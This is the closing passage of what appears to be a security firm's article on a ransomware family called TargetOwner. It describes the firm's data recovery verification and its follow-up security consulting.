After the recovery is complete, we assign a data analysis engineer to re-check the completeness of the recovered data to fully protect the client's interests, and then notify the client to verify the data.
Once the client has verified the data, we provide guidance on follow-up precautions and protective measures, and can offer a professional enterprise security programme and security consulting to defend against renewed ransomware intrusion.
Originally published on the WeChat official account (solar专业应急响应团队): [Virus analysis] Full technical upgrade, ransom doubled: the new TargetOwner ransomware family arrives in force?